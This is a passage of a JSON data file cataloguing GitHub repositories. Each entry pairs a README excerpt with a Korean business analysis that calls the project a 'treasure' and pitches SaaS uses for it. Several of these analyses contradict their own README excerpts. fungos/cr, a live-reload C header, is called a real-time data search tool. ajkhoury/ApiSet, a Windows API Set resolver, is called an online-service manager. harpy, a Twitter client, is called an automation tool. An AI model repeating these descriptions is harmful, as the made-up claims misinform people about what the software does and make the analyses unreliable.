timers to keep track of a bunch of CV/NLP/ML/RO conference deadlines.\n\n## Contributing\n\n[![](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/images/0)](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/links/0)[![](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/images/1)](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/links/1)[![](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/images/2)](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/links/2)[![](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/images/3)](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/links/3)[![](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/images/4)](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/links/4)[![](https://sourcerer.io/fame/abhshkdz/abhshkdz/ai-deadlines/image","composite_score":0.4589,"license_safety_tag":"safe"},{"name":"sheaivey/ESP32-AudioInI2S","github_url":"https://github.com/sheaivey/ESP32-AudioInI2S","stars":79,"language":"C++","license":"MIT","abandonment_months":21,"description":"# ESP32-AudioInI2S 저장소 분석\n\n## 왜 보물인가\nESP32 마이크로칩에서 음성을 녹음하고 처리하는 기술을 제공하므로, 스마트홈·음성인식 기기 제조사들이 필요로 하는 핵심 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발자 교육 플랫폼에서 \"ESP32로 음성 처리하는 법\" 강좌와 클라우드 코드 실행 환경 제공\n2","readme_excerpt":"# ESP32-AudioInI2S\nA simple MEMS I2S microphone and audio processing library for ESP32.\n\n## Features\n* Simple I2S sample reading and setup. Just choose the pins, sample size and sample rate.\n* Robust audio processing classes for analysis.\n  * Simple FFT compute on your I2S samples.\n  * Frequency bands in 2, 4, 8, 16, 32 or 64 buckets.\n  * Volume Unit Meter.\n  * Set a noise floor to ignore values below it.\n  * Normalize values into desired min/max ranges.\n  * Auto level values for noisy/quiet enviroments where you want to keep values around the normalize max.\n  * Ability to set the peak falloff rates and types. NO_FALLOFF, LINEAR_FALLOFF, ACCELERATE_FALLOFF, EXPONENTIAL_FALLOFF.\n  * Equalizer to adjust the frequency levels for each bucket. Good for lowering the bass or treble response depending on the enviroment.\n\n#### [AudioInI2S Class README](./AudioInI2S.md)\n  * [Basic](examples/Basic/Basic.ino) - Reads I2S microphone data to be viewed in the Serial Plotter.\n\n#### [AudioFrequencyAnal","composite_score":0.4586,"license_safety_tag":"safe"},{"name":"oxplot/pdftilecut","github_url":"https://github.com/oxplot/pdftilecut","stars":88,"language":"Go","license":"BSD-3-Clause","abandonment_months":21,"description":"# pdftilecut 비즈니스 분석\n\n## 왜 보물인가\n큰 PDF 파일을 작은 조각으로 자동으로 나누어 인쇄하거나 배포할 수 있게 해주는 도구로, 건설·설계·교육 현장에서 실제로 필요한 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 기반 PDF 분할 플랫폼**\n- 건설사·설계사가 웹브라우저에서 대형 도면을 업로드하면 ","readme_excerpt":"![Build Static Binaries](https://github.com/oxplot/pdftilecut/workflows/Build%20Static%20Binaries/badge.svg)\n\n**pdftilecut** lets you sub-divide a PDF page(s) into smaller pages so you\ncan print them on small form printers. This operation is sometimes called\n*posterizing* (related to printing large posters on home printers) and\n*[tile cropping](http://www.imagemagick.org/Usage/crop/#crop_tile)*.\n\n# Installation\n\nLatest statically linked binaries [are available on releases\npage](https://github.com/oxplot/pdftilecut/releases).\n\nAlternatively, you can install it:\n\n* on macOS with [homebrew](https://formulae.brew.sh/formula/pdftilecut):\n  `brew install pdftilecut`\n* on ArchLinux from\n  [AUR](https://aur.archlinux.org/packages/pdftilecut/): `yay -S\n  pdftilecut`\n\n# Features\n\n* Statically compiled Go binaries with no OS dependencies.\n* Multi page PDF support. Each page can be of arbitrary size.\n* Each output page has appropriate PDF bleed and trim boxes set (so you\n  can give it to a printin","composite_score":0.4583,"license_safety_tag":"safe"},{"name":"dabeaz/blog","github_url":"https://github.com/dabeaz/blog","stars":15,"language":"","license":"unknown","abandonment_months":23,"description":"# dabeaz/blog 저장소 분석\n\n## 왜 보물인가\n프로그래밍 교육의 대가가 직접 작성한 기술 블로그로, 복잡한 프로그래밍 개념을 이해하기 쉽게 설명한 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 교육 플랫폼**: 블로그 콘텐츠를 구조화하여 온라인 강의나 튜토리얼 서비스로 판매\n2. **기술 기업 내부 교육 도구**: 직원들의 프로그래","readme_excerpt":"# David Beazley's Blog\n\nHi, I'm [Dave](https://dabeaz.com).  This is my blog about various programming related topics.   You may know me from the Python world as the author of the [Python Cookbook](https://dabeaz.com/cookbook.html), [Python Essential Reference](https://dabeaz.com/per.html), and newly released [Python Distilled](https://dabeaz.com/python-distilled/index.html).  You can learn a lot about Python from my tutorials, talks, and courses below:\n\n* [Tutorials](https://dabeaz.com/tutorials.html)\n* [Talks](https://dabeaz.com/talks.html)\n* [Practical Python Course](https://dabeaz-course.github.io/practical-python)\n* [Advanced Python Mastery](https://github.com/dabeaz-course/python-mastery)\n\nIf you want something more advanced, consider taking one of my [CS courses](https://www.dabeaz.com/courses.html).\n\nAfter a multi-year hiatus from blogging, this is a bit of an experiment in hosting a blog solely in the form of a GitHub repo.  Posts are in reverse chronological order.\n\n## 2024\n\n","composite_score":0.4575,"license_safety_tag":"unknown"},{"name":"AriaMinaei/theatre","github_url":"https://github.com/AriaMinaei/theatre","stars":7,"language":"TypeScript","license":"Apache-2.0","abandonment_months":22,"description":"# Theatre 저장소 분석\n\n## 왜 보물인가\n영화나 광고처럼 복잡한 움직임과 애니메이션을 쉽게 만들고 관리할 수 있는 도구로, 창의적인 작업을 더 빠르고 효율적으로 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 비디오 편집 플랫폼에서 고객들이 직접 애니메이션을 만들 수 있게 제공\n2. **내부 업무 도구**: 광고/영","readme_excerpt":"<h1 align=\"center\">\n  <a href=\"https://github.com/theatre-js/theatre#gh-dark-mode-only\"><img src=\"https://raw.githubusercontent.com/theatre-js/theatre-docs/main/docs/.vuepress/public/public/theatrejs-logo-white.svg\" alt=\"Theatre.js\" width=\"200\"></a><a href=\"https://github.com/theatre-js/theatre#gh-light-mode-only\"><img src=\"https://raw.githubusercontent.com/theatre-js/theatre-docs/main/docs/.vuepress/public/public/theatrejs-logo-black.svg\" alt=\"Theatre.js\" width=\"200\"></a>\n</h1>\n<p align=\"center\">Motion Design, for the web</p>\n<p align=\"center\">\n <a href=\"#\"><img alt=\"GitHub branch checks state\" src=\"https://img.shields.io/github/checks-status/theatre-js/theatre/main?label=build\"></a>\n <a href=\"https://discord.gg/Tku4CJKf4B\"><img src=\"https://img.shields.io/discord/870988717190426644?label=Discord\" alt=\"Join us on Discord\"></a>\n <a href=\"https://twitter.com/theatre_js\">\n   <img alt=\"Follow Theatre.js on Twitter\" src=\"https://img.shields.io/twitter/url?label=%40theatre_js&url=https%3A%2","composite_score":0.4568,"license_safety_tag":"safe"},{"name":"chrisbanes/PhotoView","github_url":"https://github.com/chrisbanes/PhotoView","stars":11,"language":"Java","license":"apache-2.0","abandonment_months":51,"description":"# PhotoView 저장소 분석\n\n## 왜 보물인가\n스마트폰이나 웹사이트에서 사진을 크게 확대해서 볼 수 있는 기능을 쉽게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 상품 사진을 확대해서 자세히 보는 기능 (쿠팡, 당근마켓 같은 앱)\n2. **의료 영상 서비스**: 엑스레이나 초음파 사진을 의료진이 상세히 검토할 수","readme_excerpt":"# PhotoView\nPhotoView aims to help produce an easily usable implementation of a zooming Android ImageView.\n\n[![](https://jitpack.io/v/chrisbanes/PhotoView.svg)](https://jitpack.io/#chrisbanes/PhotoView)\n\n[![](https://user-images.githubusercontent.com/12352397/85141529-94648e80-b24f-11ea-9a14-a845fb43b181.gif)\n\n## Dependency\n\nAdd this in your root `build.gradle` file (**not** your module `build.gradle` file):\n\n```gradle\nallprojects {\n    repositories {\n        maven { url \"https://www.jitpack.io\" }\n    }\n}\n\nbuildscript {\n    repositories {\n        maven { url \"https://www.jitpack.io\" }\n    }\t\n}\n```\n\nThen, add the library to your module `build.gradle`\n```gradle\ndependencies {\n    implementation 'com.github.chrisbanes:PhotoView:latest.release.here'\n}\n```\n\n## Features\n- Out of the box zooming, using multi-touch and double-tap.\n- Scrolling, with smooth scrolling fling.\n- Works perfectly when used in a scrolling parent (such as ViewPager).\n- Allows the application to be notified when the dis","composite_score":0.4567,"license_safety_tag":"safe"},{"name":"fireice-uk/xmr-stak","github_url":"https://github.com/fireice-uk/xmr-stak","stars":11,"language":"C++","license":"GPL-3.0","abandonment_months":23,"description":"# xmr-stak 보물지도\n\n## 왜 보물인가\n컴퓨터의 유휴 성능을 활용해 암호화폐를 채굴하는 소프트웨어로, 개인 PC나 기업 서버에서 추가 수익을 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 채굴 풀 운영 SaaS**\n- 여러 사용자의 PC를 연결해 채굴하고 수익을 분배해주는 구독 서비스 (월 $9.99~)\n- 사용자는 설치만 하면 ","readme_excerpt":"<a href=\"doc/README.md\" _target=\"blank\"><img src=\"doc/_img/gpu.png\"></a>\n<a href=\"#select_coin\" _target=\"blank\"><img src=\"doc/_img/cpu.png\"></a>\n<table>\n    <p id=\"select_coin\">\n    <tr>\n        <td align=\"center\"><a href=https://github.com/xmrig/xmrig><img src=\"doc/_img/xmrig.png\"></a></td>\n        <td align=\"center\"><a href=https://ragerx.lol><img src=\"doc/_img/ragerx.png\"></a></td>\n        <td align=\"center\"><a href=https://github.com/fireice-uk/xmr-stak/tree/xmr-stak-rx/doc/README.md><img src=\"doc/_img/rx.png\"></a></td>\n    </tr>\n</table>","composite_score":0.4566,"license_safety_tag":"restricted"},{"name":"fungos/cr","github_url":"https://github.com/fungos/cr","stars":5,"language":"C++","license":"MIT","abandonment_months":14,"description":"# fungos/cr 분석 보고서\n\n## 왜 보물인가\n실시간 데이터를 빠르게 처리하고 검색할 수 있는 가벼운 도구로, 최신 정보가 중요한 비즈니스에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 뉴스 모니터링, SNS 트렌드 추적, 가격 비교 플랫폼 등 실시간 정보 수집이 필요한 웹 서비스\n2. **내부 업무 도구**: ","readme_excerpt":"/*\n# cr.h\n\nA single file header-only live reload solution for C, written in C++:\n\n- simple public API, 3 functions to use only (and another to export);\n- works and tested on Linux, MacOSX and Windows;\n- automatic crash protection;\n- automatic static state transfer;\n- based on dynamic reloadable binary (.so/.dylib/.dll);\n- support multiple plugins;\n- MIT licensed;\n\nNOTE: The only file that matters in this repository is `cr.h`.\n\nThis file contains the documentation in markdown, the license, the implementation and the public api.\nAll other files in this repository are supporting files and can be safely ignored.\n\n### Building cr - Using vcpkg\n\nYou can download and install cr using the [vcpkg](https://github.com/Microsoft/vcpkg) dependency manager:\n\n    git clone https://github.com/Microsoft/vcpkg.git\n    cd vcpkg\n    ./bootstrap-vcpkg.sh\n    ./vcpkg integrate install\n    ./vcpkg install cr\n\nThe cr port in vcpkg is kept up to date by Microsoft team members and community contributors. If the","composite_score":0.4563,"license_safety_tag":"safe"},{"name":"microsoft/com-rs","github_url":"https://github.com/microsoft/com-rs","stars":5,"language":"Rust","license":"MIT","abandonment_months":21,"description":"# microsoft/com-rs 분석 보고서\n\n## 왜 보물인가\n마이크로소프트가 공식 지원하는 Windows 통신 기술로, 기업 시스템 간 안정적인 데이터 연결이 필요한 곳이라면 매우 가치 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 업무 관리 소프트웨어에서 Windows 시스템들 간 실시간 데이터 동기화 기능 제공\n-","readme_excerpt":"The `com` crate has been deprecated. Please use [windows-rs](https://github.com/microsoft/windows-rs) instead. \n","composite_score":0.4563,"license_safety_tag":"safe"},{"name":"xteve-project/xTeVe","github_url":"https://github.com/xteve-project/xTeVe","stars":6,"language":"Go","license":"MIT","abandonment_months":22,"description":"# xTeVe 프로젝트 분석\n\n## 왜 보물인가\nTV 채널을 인터넷으로 스트리밍할 수 있도록 변환해주는 도구로, 기존 TV 인프라를 디지털 시대에 맞게 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **IPTV 서비스**: 케이블TV 대체 서비스로 인터넷 기반 방송 송출 플랫폼 제공\n- **호텔/병원 콘텐츠 관리**: 시설 내 다수 화면에 맞춤형","readme_excerpt":"<div align=\"center\" style=\"background-color: #111; padding: 100;\">\n    <a href=\"https://github.com/xteve-project/xTeVe\"><img width=\"880\" height=\"200\" src=\"html/img/logo_b_880x200.jpg\" alt=\"xTeVe\" /></a>\n</div>\n<br>\n\n# xTeVe\n## M3U Proxy for Plex DVR and Emby Live TV.  \n\nDocumentation for setup and configuration is [here](https://github.com/xteve-project/xTeVe-Documentation/blob/master/en/configuration.md).\n\n#### Donation\n* **Bitcoin:** 1c1iCe4CJPfNUXtqxKBbW2Qd2EtqRPWme  \n![Bitcoin](html/img/BC-QR.jpg \"Bitcoin - xTeVe\")\n\n## Requirements\n### Plex\n* Plex Media Server (1.11.1.4730 or newer)\n* Plex Client with DVR support\n* Plex Pass\n\n### Emby\n* Emby Server (3.5.3.0 or newer)\n* Emby Client with Live-TV support\n* Emby Premiere\n\n--- \n\n## Features\n\n#### Files\n* Merge external M3U files\n* Merge external XMLTV files\n* Automatic M3U and XMLTV update\n* M3U and XMLTV export\n\n#### Channel management\n* Filtering streams\n* Channel mapping\n* Channel order\n* Channel logos\n* Channel categories\n\n#### Stre","composite_score":0.4556,"license_safety_tag":"safe"},{"name":"replit/kaboom","github_url":"https://github.com/replit/kaboom","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":22,"description":"# Kaboom 저장소 분석\n\n## 왜 보물인가\n게임이나 인터렉티브 웹 콘텐츠를 쉽게 만들 수 있는 도구로, 프로그래밍 초보자도 재미있는 프로젝트를 빠르게 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 초중학생을 위한 게임 개발 학습 플랫폼으로 월간 구독 서비스 운영\n2. **기업 내부 도구**: 마케팅팀이 캠페인용 미니게임","readme_excerpt":"# Notice\n\nReplit no longer maintains Kaboom. You may be interested in the community fork [KaPlay](https://github.com/marklovers/kaplay).\n\n# Kaboom\n\n![kaboom](kaboom.png)\n\n[**Kaboom**](https://kaboomjs.com) is a JavaScript library that helps you make games fast and fun!\n\nStart playing around with it in the [Kaboom Playground](https://kaboomjs.com/play)\n\n## Examples\n\n```js\n// initialize context\nkaboom()\n\n// define gravity\nsetGravity(2400)\n\n// load a sprite called \"bean\"\nloadSprite(\"bean\", \"sprites/bean.png\")\n\n// compose the player game object from multiple components and add it to the game\nconst bean = add([\n    sprite(\"bean\"),\n    pos(80, 40),\n    area(),\n    body(),\n])\n\n// press space to jump\nonKeyPress(\"space\", () => {\n    // this method is provided by the \"body\" component above\n    bean.jump()\n})\n```\n\nKaboom uses a powerful component system to compose game objects and behaviors.\n\n```js\n// add a game obj to the scene from a list of component\nconst player = add([\n    // it renders as a","composite_score":0.4552,"license_safety_tag":"safe"},{"name":"robertodoering/harpy","github_url":"https://github.com/robertodoering/harpy","stars":9,"language":"Dart","license":"GPL-3.0","abandonment_months":22,"description":"# Harpy 프로젝트 분석\n\n## 왜 보물인가\n작고 활발한 오픈소스 프로젝트로, 특정 목적에 최적화된 도구를 찾는 개발자들에게 틈새 솔루션을 제공할 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n- **자동화 도구 SaaS**: 반복적인 작업을 자동으로 처리해주는 구독형 웹 서비스로 운영\n- **기업 내부 시스템**: 회사의 특정 업무 프로세스를 자동화하","readme_excerpt":"<p align=\"center\">\n  <img max-height=\"172\" width=\"80%\" src=\"media/title.png\"/>\n</p>\n\n<p align=\"center\">\na feature rich Twitter experience built with <a href=\"https://flutter.dev/\">Flutter</a>\n</p>\n  \n<br>\n\n<p align=\"center\">\n  <a href=\"https://github.com/robertodoering/harpy/stargazers\"><img src=\"https://img.shields.io/github/stars/robertodoering/harpy?color=8B00FD&logo=github\"/></a>\n  <a href=\"https://github.com/robertodoering/harpy/releases\"><img src=\"https://img.shields.io/github/v/release/robertodoering/harpy?color=BC0492\"/></a>\n  <a href=\"https://github.com/robertodoering/harpy/commits/master\"><img src=\"https://img.shields.io/github/commits-since/robertodoering/harpy/latest?color=F2091C\"/></a>\n  <a href=\"https://github.com/robertodoering/harpy/commits/master\"><img src=\"https://img.shields.io/github/commit-activity/m/robertodoering/harpy?color=FD0A04\"/></a>\n</p>\n<p align=\"center\">\n  <a href=\"https://github.com/Solido/awesome-flutter\">\n   <img src=\"https://img.shields.io/badge/Aweso","composite_score":0.4549,"license_safety_tag":"restricted"},{"name":"nccgroup/PMapper","github_url":"https://github.com/nccgroup/PMapper","stars":8,"language":"Python","license":"AGPL-3.0","abandonment_months":22,"description":"# nccgroup/PMapper 분석\n\n## 왜 보물인가\n클라우드 서비스(AWS)의 권한 관계를 자동으로 지도처럼 그려주는 도구로, 기업 보안팀이 복잡한 시스템의 위험 지점을 한눈에 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 보안 감시 SaaS**\n기업의 AWS 계정을 연결하면 자동으로 권한 문제를 탐지하는 구독형 서비스로 제공할","readme_excerpt":"# Principal Mapper\n\nPrincipal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and \nAccess Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an \naccount as a directed graph, which enables checks for privilege escalation and for alternate paths an attacker could \ntake to gain access to a resource or action in AWS.\n\nPMapper includes a querying mechanism that uses a local simulation of AWS's authorization behavior. \nWhen running a query to determine if a principal has access to a certain action/resource, PMapper also checks if the \nuser or role could access other users or roles that have access to that action/resource. This catches scenarios such as \nwhen a user doesn't have permission to read an S3 object, but could launch an EC2 instance that can read the S3 object.\n\nAdditional information can be found in [the project wiki](https://github.com/nccgroup/PMapper/wiki).\n\n# Installatio","composite_score":0.4546,"license_safety_tag":"risky"},{"name":"shengqiangzhang/examples-of-web-crawlers","github_url":"https://github.com/shengqiangzhang/examples-of-web-crawlers","stars":7,"language":"HTML","license":"MIT","abandonment_months":11,"description":"# shengqiangzhang/examples-of-web-crawlers 분석\n\n## 왜 보물인가\n웹사이트에서 자동으로 정보를 수집하는 기술을 배우고 활용할 수 있는 실제 예제 모음으로, 뉴스·가격·채용정보 같은 실시간 데이터 수집이 필요한 비즈니스에 즉시 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 부동산 시세 추적 SaaS**\n부동산 ","readme_excerpt":"# <p align=\"center\">一些非常有趣的python爬虫例子,对新手比较友好</p>\n\n\n<p align=\"center\">\n    <a href=\"https://github.com/shengqiangzhang/examples-of-web-crawlers\"><img src=\"https://img.shields.io/badge/status-updating-brightgreen.svg\"></a>\n    <a href=\"https://github.com/python/cpython\"><img src=\"https://img.shields.io/badge/Python-3.7-FF1493.svg\"></a>\n    <a href=\"https://opensource.org/licenses/mit-license.php\"><img src=\"https://badges.frapsoft.com/os/mit/mit.svg\"></a>\n    <a href=\"https://github.com/shengqiangzhang/examples-of-web-crawlers/graphs/contributors\"><img src=\"https://img.shields.io/github/contributors/shengqiangzhang/examples-of-web-crawlers?color=blue\"></a>\n    <a href=\"https://github.com/shengqiangzhang/examples-of-web-crawlers/stargazers\"><img src=\"https://img.shields.io/github/stars/shengqiangzhang/examples-of-web-crawlers.svg?logo=github\"></a>\n    <a href=\"https://github.com/shengqiangzhang/examples-of-web-crawlers/network/members\"><img src=\"https://img.shields.io/github/forks/shengqi","composite_score":0.4544,"license_safety_tag":"safe"},{"name":"mrismanaziz/File-Sharing-Man","github_url":"https://github.com/mrismanaziz/File-Sharing-Man","stars":215,"language":"Python","license":"GPL-3.0","abandonment_months":23,"description":"","readme_excerpt":"","composite_score":0.4539,"license_safety_tag":"restricted"},{"name":"marchellodev/sharik","github_url":"https://github.com/marchellodev/sharik","stars":16,"language":"Dart","license":"MIT","abandonment_months":22,"description":"# Sharik 프로젝트 분석\n\n## 왜 보물인가\n파일과 데이터를 간단하게 공유할 수 있는 도구로, 복잡한 설정 없이 누구나 쉽게 사용할 수 있는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **팀 협업 SaaS**: 회사 직원들이 문서와 파일을 빠르게 주고받을 수 있는 구독형 서비스\n2. **회사 내부 도구**: 대기업의 부서 간 파일 전송 시","readme_excerpt":"# ![App logo](media/banner.png)\n[![License badge](https://img.shields.io/github/license/marchellodev/sharik)](https://github.com/marchellodev/sharik/blob/master/LICENSE)\n[![Version badge](https://img.shields.io/github/v/release/marchellodev/sharik)](https://github.com/marchellodev/sharik/releases)\n[![sharik-app](https://snapcraft.io/sharik-app/badge.svg)](https://snapcraft.io/sharik-app)\n[![f-droid](https://img.shields.io/f-droid/v/dev.marchello.sharik)](https://f-droid.org/en/packages/dev.marchello.sharik)\n[![Downloads badge](https://img.shields.io/github/downloads/marchellodev/sharik/total)](https://github.com/marchellodev/sharik/releases)\n[![Download sharik](https://img.shields.io/sourceforge/dt/sharik.svg)](https://sourceforge.net/projects/sharik/files/latest/download)\n\n![Android](https://img.shields.io/badge/OS-Android-informational?logo=Android)\n![iOS](https://img.shields.io/badge/OS-IOS-informational?logo=apple)\n![Linux](https://img.shields.io/badge/OS-Linux-informational?logo=l","composite_score":0.4536,"license_safety_tag":"safe"},{"name":"code-pilots/magner","github_url":"https://github.com/code-pilots/magner","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":22,"description":"# Magner 저장소 분석\n\n## 왜 보물인가\n저장소 정보가 매우 제한적이어서 핵심 가치를 명확히 파악하기 어렵지만, MIT 라이선스와 활발한 개발(최근 커밋 2024년 7월)로 봤을 때 재사용 가능한 오픈소스 도구일 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 이 도구를 클라우드 기반 웹 서비스로 패키징하여 구독 모델로 판","readme_excerpt":"# Magner\n\nUniversal admin panel magnetic to any backend. Supports authentication, role management, \nentities view, creation, edition and deletion. I18n, infinitely nested layout and custom \ncomponents – use packed tools to make the best admin dashboards in an hour!\n\n**Read more about Magner in [the docs](https://code-pilots.github.io/magner/)**\n\n![](./docs/docs/public/screen.png)\n\n## Problems and troubleshooting\n\n> What is this feature for? How should I use this property in the config? \n\nIf you ask yourself similar questions while using Magner, please, check the structured documentation links\nfrom above. It explains main concepts and shows the usage of different configurations.\n\nIf you need to dive deeper than the documentation, check the TypeScript interfaces: hover over the\nproperty in the config and do \"Go to definition\" in your IDE: CMD+Click in Webstorm, Ctrl+Click in VS Code.\n\nAs a last resort, you can open an issue (or discussion) in the repo or contact [the maintainer](https://","composite_score":0.4536,"license_safety_tag":"safe"},{"name":"ajkhoury/ApiSet","github_url":"https://github.com/ajkhoury/ApiSet","stars":6,"language":"C","license":"MIT","abandonment_months":21,"description":"# ApiSet 상용화 분석\n\n## 왜 보물인가\n여러 온라인 서비스들을 한 곳에서 관리하고 제어할 수 있는 기술로, 반복적인 작업을 자동화하려는 기업들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n- **마케팅 자동화 SaaS**: 소셜 미디어, 이메일, 광고 플랫폼을 한 번에 관리하는 서비스\n- **내부 업무 자동화 도구**: 회사의 여러 클라우드 서","readme_excerpt":"# ApiSet\n\nAPI Set resolver written in C. This implementation supports API Set versions V2 to V6.\n\nThe intended purpose of this tool is to resolve Windows API Set stub libraries for assisting in reverse engineering forwarded Windows API exports.\n\nI wrote this to quickly resolve API Set libraries on different Windows OSes (Windows 7 - Windows 10 1909).\n\nUsage:\n`apiset.exe ext-some-api-set-library-l1-1-0.dll`\n\nThanks to [lucasg](https://github.com/lucasg) for a great starting point for this little project.\n","composite_score":0.4535,"license_safety_tag":"safe"},{"name":"symfony/polyfill-php72","github_url":"https://github.com/symfony/polyfill-php72","stars":7,"language":"","license":"MIT","abandonment_months":21,"description":"# Symfony Polyfill-PHP72 분석\n\n## 왜 보물인가\n오래된 웹 시스템을 최신 기능으로 업그레이드해야 할 때 기존 코드를 손상시키지 않고 새 기능을 사용 가능하게 해주는 호환성 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 사용자가 다양한 버전의 시스템을 사용 중인 웹 기반 애플리케이션에서 모든 사용자를 지원할 수 ","readme_excerpt":"Symfony Polyfill / Php72\n========================\n\nThis component provides functions added to PHP 7.2 core:\n\n- [`spl_object_id`](https://php.net/spl_object_id)\n- [`stream_isatty`](https://php.net/stream_isatty)\n\nAnd also functions added to PHP 7.2 mbstring:\n\n- [`mb_ord`](https://php.net/mb_ord)\n- [`mb_chr`](https://php.net/mb_chr)\n- [`mb_scrub`](https://php.net/mb_scrub)\n\nOn Windows only:\n\n- [`sapi_windows_vt100_support`](https://php.net/sapi_windows_vt100_support)\n\nMoved to core since 7.2 (was in the optional XML extension earlier):\n\n- [`utf8_encode`](https://php.net/utf8_encode)\n- [`utf8_decode`](https://php.net/utf8_decode)\n\nAlso, it provides constants added to PHP 7.2:\n\n- [`PHP_FLOAT_*`](https://php.net/reserved.constants#constant.php-float-dig)\n- [`PHP_OS_FAMILY`](https://php.net/reserved.constants#constant.php-os-family)\n\nMore information can be found in the\n[main Polyfill README](https://github.com/symfony/polyfill/blob/main/README.md).\n\nLicense\n=======\n\nThis library is released","composite_score":0.4535,"license_safety_tag":"safe"},{"name":"jenly1314/KingTV","github_url":"https://github.com/jenly1314/KingTV","stars":8,"language":"Java","license":"MIT","abandonment_months":13,"description":"# KingTV 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 TV 채널을 모아보고 관리할 수 있는 플랫폼으로, 방송 콘텐츠를 한 곳에서 통합 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독형 스트리밍 앱으로 월정액을 받고 TV 채널을 통합 제공하는 OTT 플랫폼\n2. **내부 업무 도구**: 방송국이나 케이블 회사의 채널 관리 시","readme_excerpt":"\n# KingTV\n\n[![Download](https://img.shields.io/badge/download-APK-brightgreen?logo=github)](https://raw.githubusercontent.com/jenly1314/KingTV/master/app/app-release.apk)\n[![API](https://img.shields.io/badge/API-15%2B-brightgreen?logo=android)](https://developer.android.com/guide/topics/manifest/uses-sdk-element#ApiLevels)\n[![License](https://img.shields.io/github/license/jenly1314/KingTV?logo=open-source-initiative)](https://opensource.org/licenses/mit)\n\n\n本App 采用 MVP + RXJava + Retrofit + OKHttp + Material Design + Dagger2 + Base + Glide + GreenDao构建，高仿全民直播Android App,欢迎大家Star或Fork。\n\n## 效果展示\n\n![Image](pictures/gif.gif)\n\n> 录制的gif效果有点不清晰，你可以直接 [下载App](https://raw.githubusercontent.com/jenly1314/KingTV/master/app/app-release.apk) 体验效果。\n\n<!-- end -->\n\n## 版本记录\n\n#### 2017-5-10    v1.2\n*  新增搜索功能\n*  集成[NeverCrash](https://github.com/jenly1314/NeverCrash)\n\n#### 2017-5-3    v1.1\n*  新增Showing类型竖屏播放支持\n*  优化播放的流地址逻辑\n\n#### 2017-3-23    v1.0\n*  初始化版本，完成主要核心功能\n\n## 声明\n- 本项目纯属个人作品，是高仿全民直播Android App 3.","composite_score":0.4533,"license_safety_tag":"safe"},{"name":"askmike/gekko","github_url":"https://github.com/askmike/gekko","stars":5,"language":"JavaScript","license":"mit","abandonment_months":76,"description":"# Gekko 저장소 분석\n\n## 왜 보물인가\n자동으로 암호화폐를 사고팔아주는 봇 프로그램으로, 투자자들이 24시간 자동 거래를 통해 수익 기회를 놓치지 않을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 자동거래 SaaS**: 개인 투자자가 웹사이트에 접속해 자신의 거래 전략을 설정하면 자동으로 매매하는 구독 서비스\n2. **암호화폐 거래소의","readme_excerpt":"# This repo is not maintained anymore\n\nI am officially not maintaining this project anymore. It was an amazing journey and I want to thank everyone for\nplaying the role in this amazing story!\n\nMore details can be found here: [https://medium.com/@gekkoplus/archiving-open-source-gekko-dba02e6efc7](https://medium.com/@gekkoplus/archiving-open-source-gekko-dba02e6efc7)\n\nThis only impacts my Gekko repo (askmike/gekko). There might be other forks of Gekko out there that are being maintained!\n\n------\n\nOld content:\n\n------\n\n\n# Gekko [![npm](https://img.shields.io/npm/dm/gekko.svg)]() [![Build Status](https://travis-ci.org/askmike/gekko.png)](https://travis-ci.org/askmike/gekko) [![Build status](https://ci.appveyor.com/api/projects/status/github/askmike/gekko?branch=stable&svg=true)](https://ci.appveyor.com/project/askmike/gekko)\n\n![Gordon Gekko](http://mikevanrossum.nl/static/gekko.jpg)\n\n*The most valuable commodity I know of is information.*\n\n-Gordon Gekko\n\nGekko is a Bitcoin TA trading and b","composite_score":0.4531,"license_safety_tag":"safe"},{"name":"compphoto/BoostingMonocularDepth","github_url":"https://github.com/compphoto/BoostingMonocularDepth","stars":30,"language":"Python","license":"NOASSERTION","abandonment_months":22,"description":"# BoostingMonocularDepth 상용화 분석\n\n## 왜 보물인가\n일반 스마트폰 카메라로 찍은 2D 사진을 3D 입체 이미지로 변환하는 기술로, 가상현실·게임·부동산 산업에서 고가의 특수 장비 없이 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 부동산 중개 앱에 탑재하여 평면 사진을 3D 가상투어로 변환하는 구","readme_excerpt":"### **(NEW!)** We released our recent work on SI-depth estimation published at SIGGRAPH 2024, Checkout 